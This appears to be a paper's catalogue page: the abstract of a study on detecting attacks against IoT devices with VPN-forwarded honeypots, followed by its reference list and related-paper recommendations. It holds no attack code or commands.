ABSTRACT
Attacks on Internet of Things (IoT) devices, exploiting inherent vulnerabilities, have intensified over the last few years. Recent large-scale attacks, such as Persirai, Hakai, etc. corroborate concerns about the security of IoT devices. In this work, we propose an approach that allows easy integration of commercial off-the-shelf IoT devices into a general honeypot architecture. Our approach projects a small number of heterogeneous IoT devices (that are physically at one location) as many (geographically distributed) devices on the Internet, using connections to commercial and private VPN services. The goal is for those devices to be discovered and exploited by attacks on the Internet, thereby revealing unknown vulnerabilities. For detection and examination of potentially malicious traffic, we devise two analysis strategies: (1) given an outbound connection from honeypot, backtrack into network traffic to detect the corresponding attack command that caused the malicious connection and use it to download malware, (2) perform live detection of unseen URLs from HTTP requests using adaptive clustering. We show that our implementation and analysis strategies are able to detect recent large-scale attacks targeting IoT devices (IoT Reaper, Hakai, etc.) with overall low cost and maintenance effort.
- 2017. Persirai: New Internet of Things (IoT) Botnet Targets IP Cameras. http://blog. trendmicro.com/trendlabs-security-intelligence/ persirai-new-internet-things-iot-botnet-targets-ip-cameras/Google Scholar
- 2018. Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns - Palo Alto Networks Blog. https://researchcenter.paloaltonetworks.com/2018/07/ unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/. (Accessed on 08/17/2018).Google Scholar
- M Anirudh, S Arul Thileeban, and Daniel Jeswin Nallathambi. 2017. Use of honeypots for mitigating DoS attacks targeted on IoT networks. In Proceedings of Conference on Computer, Communication and Signal Processing (ICCCSP). IEEE, 1--4.Google ScholarCross Ref
- console cowboys. 2012. Trendnet Camera (Multiple Products) - Remote Security Bypass. https://www.exploit-db.com/exploits/ 36680/.Google Scholar
- Ang Cui and Salvatore J Stolfo. 2010. A quantitative analysis of the insecurity of embedded network devices: results of a widearea scan. In Proceedings of the Annual Computer Security Applications Conference (ACSAC). ACM, 97--106. Google ScholarDigital Library
- Earlence Fernandes, Jaeyeon Jung, and Atul Prakash. 2016. Security analysis of emerging smart home applications. In Security and Privacy (SP), 2016 IEEE Symposium on. IEEE, 636--654.Google ScholarCross Ref
- Juan David Guarnizo, Amit Tambe, Suman Sankar Bhunia, Martín Ochoa, Nils Ole Tippenhauer, Asaf Shabtai, and Yuval Elovici. 2017. SIPHON: Towards scalable high-interaction physical honeypots. In Proceedings of the ACM Workshop on Cyber-Physical System Security. ACM, ACM, 57--68. Google ScholarDigital Library
- Thorsten Holz, Markus Engelberth, and Felix Freiling. 2009. Learning more about the underground economy: A case-study of keyloggers and dropzones. In European Symposium on Research in Computer Security. Springer, 1--18. Google ScholarDigital Library
- IP Intelligence. 2018. Free Proxy / VPN / TOR / Bad IP Detection Service via API and Web Interface | IP Intelligence. https:// getipintel.net/. (Accessed on 01/03/2017).Google Scholar
- Thommen George Karimpanal and Erik Wilhelm. 2017. Identification and off-policy learning of multiple objectives using adaptive clustering. Neurocomputing 263 (2017), 39--47.Google ScholarCross Ref
- Pierre Kim. 2017. Multiple vulnerabilities found in Wireless IP Camera (P2P) WIFICAM cameras and vulnerabilities in custom http server. https://pierrekim. github.io/blog/2017-03-08-camera-goahead-0day.html# pre-auth-info-leak-goahead.Google Scholar
- Constantinos Kolias, Georgios Kambourakis, Angelos Stavrou, and Jeffrey Voas. 2017. DDoS in the IoT: Mirai and Other Botnets. Computer 50, 7 (2017), 80--84.Google ScholarDigital Library
- Brian Krebs. 2016. KrebsOnSecurity Hit With Record DDoS. https://krebsonsecurity.com/2016/09/ krebsonsecurity-hit-with-record-ddos/.Google Scholar
- Tongbo Luo, Zhaoyan Xu, Xing Jin, Yanhui Jia, and Xin Ouyang. 2017. IoTCandyJar: Towards an Intelligent-Interaction Honeypot for IoT Devices. In Proceedings of Blackhat.Google Scholar
- Bill Miller and Dale Rowe. 2012. A Survey SCADA of and Critical Infrastructure Incidents. In Proceedings of the 1st Annual Conference on Research in Information Technology (RIIT '12). ACM, New York, NY, USA, 51--56. Google ScholarDigital Library
- Roberto Minerva, Abyi Biru, and Domenico Rotondi. 2015. Towards a definition of the Internet of Things (IoT). IEEE Internet Initiative (May 2015). http://iot.ieee.org/images/files/pdf/IEEE_IoT_Towards_ Definition_Internet_of_Things_Revision1_27MAY15.pdfGoogle Scholar
- Iyatiti Mokube and Michele Adams. 2007. Honeypots: concepts, approaches, and challenges. In Proceedings of the annual southeast regional conference. ACM, 321--326. Google ScholarDigital Library
- Sukhvir Notra, Muhammad Siddiqi, Hassan Habibi Gharakheili, Vijay Sivaraman, and Roksana Boreli. 2014. An experimental study of security and privacy risks with emerging household appliances. In Communications and Network Security (CNS), 2014 IEEE Conference on. IEEE, 79--84.Google ScholarCross Ref
- Yin Minn Pa Pa, Shogo Suzuki, Katsunari Yoshioka, Tsutomu Matsumoto, Takahiro Kasama, and Christian Rossow. 2016. IoTPOT: A Novel Honeypot for Revealing Current IoT Threats. Journal of Information Processing 24, 3 (2016), 522--533.Google ScholarCross Ref
- Mark Patton, Eric Gross, Ryan Chinn, Samantha Forbis, Leon Walker, and Hsinchun Chen. 2014. Uninvited connections: a study of vulnerable devices on the internet of things (IoT). In Proceedings of Intelligence and Security Informatics Conference (JISIC). IEEE, 232--235. Google ScholarDigital Library
- Niels Provos and Thorsten Holz. 2007. Virtual honeypots: from botnet tracking to intrusion detection. Addison-Wesley Professional. Google ScholarDigital Library
- Shodan Project. 2017. Shodan. https://www.shodan.io/. (Accessed on 10/18/2017).Google Scholar
- Vijay Sivaraman, Dominic Chan, Dylan Earl, and Roksana Boreli. 2016. Smart-phones attacking smart-homes. In Proceedings of the 9th ACM Conference on Security & Privacy in Wireless and Mobile Networks. ACM, 195--200. Google ScholarDigital Library
- Vijay Sivaraman, Hassan Habibi Gharakheili, Arun Vishwanath, Roksana Boreli, and Olivier Mehani. 2015. Network-level security and privacy control for smart-home IoT devices. In Proceedings of Conference on Wireless and Mobile Computing, Networking and Communications (WiMob). IEEE, 163--167.Google ScholarCross Ref
- Rob van der Meulen. 2016. Gartner Says 8.4 Billion Connected Things Will Be in Use in 2017, Up 31 Percent From 2016. http: //www.gartner.com/newsroom/id/3598917.Google Scholar
- Yegenshen. 2017. IoT_reaper: A Rappid Spreading New IoT Botnet. http://blog.netlab.360.com/iot_ reaper-a-rappid-spreading-new-iot-botnet-en/.Google Scholar
- Tianlong Yu, Vyas Sekar, Srinivasan Seshan, Yuvraj Agarwal, and Chenren Xu. 2015. Handling a trillion (unfixable) flaws on a billion devices: Rethinking network security for the internet-ofthings. In Proceedings of the ACM Workshop on Hot Topics in Networks. ACM. Google ScholarDigital Library
Index Terms
- Detection of Threats to IoT Devices using Scalable VPN-forwarded Honeypots
Recommendations
Scalable VPN-forwarded Honeypots: Dataset and Threat Intelligence Insights
ICSS 2020: Sixth Annual Industrial Control System Security (ICSS) WorkshopAfter distributed denial-of-service attacks by the Mirai malware in 2016, large-scale attacks exploiting IoT devices raise significant security concerns for the stakeholders involved. The efficacy of setting up honeypots to survey the threat landscape ...
Edge-Based Intrusion Detection for IoT devices
Special Issue on Analytics for Cybersecurity and Privacy, Part 1As the Internet of Things (IoT) is estimated to grow to 25 billion by 2021, there is a need for an effective and efficient Intrusion Detection System (IDS) for IoT devices. Traditional network-based IDSs are unable to efficiently detect IoT malware and ...
Rule generalisation in intrusion detection systems using SNORT
Intrusion Detection Systems (IDSs) provide an important layer of security for computer systems and networks. An IDS's responsibility is to detect suspicious or unacceptable system and network activity and to alert a systems administrator to this ...
Comments